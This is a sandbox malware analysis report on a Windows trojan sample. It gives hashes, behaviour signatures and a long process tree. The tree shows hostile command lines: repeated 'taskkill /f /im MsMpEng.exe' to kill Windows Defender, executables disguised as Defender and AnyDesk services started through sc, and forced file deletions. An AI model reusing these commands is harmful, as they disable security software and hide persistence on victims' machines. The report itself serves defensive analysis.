Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Analysis ID:1521703
MD5:95408095927f78deffaeb9cb1f4cd44d
SHA1:5e98f7cc5b8bce4dcefddc0313fe1ccc15ffe08c
SHA256:0c7b1dafed4420aab551544f4ca8813f1556e19442f75046b00bb0c952215456
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates files in the system32 config directory
Drops executables to the windows directory (C:\Windows) and starts them
Excessive usage of taskkill to terminate processes
Uses taskkill to terminate AV processes
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe (PID: 2404 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe" MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
    • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • MicrosoftWindowsDefenderCoreService.exe (PID: 6636 cmdline: "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" install MD5: 9CEBC167FF7C8AE3CCFFB718FD7B52D0)
      • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskCrashHandler.exe (PID: 5996 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
        • cmd.exe (PID: 4600 cmdline: C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5660 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • Conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4544 cmdline: C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 4236 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • Conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AnyDeskCrashHandler.exe (PID: 6080 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
      • cmd.exe (PID: 1484 cmdline: C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3748 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • cmd.exe (PID: 3792 cmdline: C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7024 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • MicrosoftWindowsDefenderCoreService.exe (PID: 2128 cmdline: "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" MD5: 9CEBC167FF7C8AE3CCFFB718FD7B52D0)
    • AnyDeskCrashHandler.exe (PID: 6636 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
    • cmd.exe (PID: 6996 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 2976 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 2732 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 3220 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3984 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1088 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6628 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 1780 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5712 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3744 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5024 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 4892 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 5340 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 572 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3172 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3756 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3852 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 7052 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 6324 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • Conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 420 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1600 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5748 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3540 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 6928 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 6216 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • Conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5016 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5908 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 4876 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5564 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 4048 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 5464 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6484 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3532 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6068 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AnyDeskUpdateService.exe (PID: 6552 cmdline: "C:\Windows\System32\oobe\AnyDeskUpdateService.exe" MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
    • cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AnyDeskCrashHandler.exe (PID: 4196 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
    • cmd.exe (PID: 5908 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4232 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4876 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AnyDeskUpdateService.exe (PID: 5908 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
          • cmd.exe (PID: 1944 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • Conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5656 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1880 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 3796 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3792 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3748 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4072 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5916 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1592 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1408 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1944 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • Conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1212 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3404 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • Conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5916 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6316 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5156 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6248 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • Conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7004 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 2168 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5996 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5320 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5608 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5100 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4892 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2404 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1484 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4832 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5164 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4072 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 2120 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1812 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2836 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2036 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • Conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5036 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1132 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6212 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
